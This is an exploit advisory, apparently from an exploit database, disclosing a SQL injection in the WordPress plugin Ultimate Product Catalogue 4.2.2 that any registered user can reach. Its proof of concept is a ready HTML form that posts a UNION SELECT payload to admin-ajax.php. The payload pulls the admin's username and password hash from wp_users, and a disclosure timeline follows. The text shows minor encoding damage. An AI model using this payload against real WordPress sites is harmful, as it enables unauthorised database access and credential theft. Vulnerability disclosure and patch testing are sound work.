# Exploit Title: Ultimate Product Catalogue 4.2.2 Sql Injection a Plugin WordPress a Sql Injection # Exploit Author: Lenon Leite # Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/ # Software Link: https://wordpress.org/plugins/ultimate-product-catalogue/ # Contact: http://twitter.com/lenonleite # Website: http://lenonleite.com.br/ # Category: webapps # Version: 4.2.2 # Tested on: Ubuntu 16.04 1 - Description: Type user access: register user. $_POST[aCatIDa] is not escaped. http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-injection/ 2 - Proof of Concept: 1 a Login as regular user (created using wp-login.php?action=register): 2 a Using: <*form method="post" action="http://target/wp-admin/admin-ajax.php?action=get_upcp_subcategories"> <*input type="text" name="CatID" value="0 UNION SELECT user_login,user_pass FROM wp_users WHERE ID=1"> <*input type="submit"> *delete a*a in code* 3 - Timeline: - 22/05/2017 a Discovered - 24/05/2017 a Vendor not finded - **/06/2017 - Corrected ***Rename plugin txt to zip. Problem with gmail block. -- *Atenciosamente* *Lenon Leiteaa*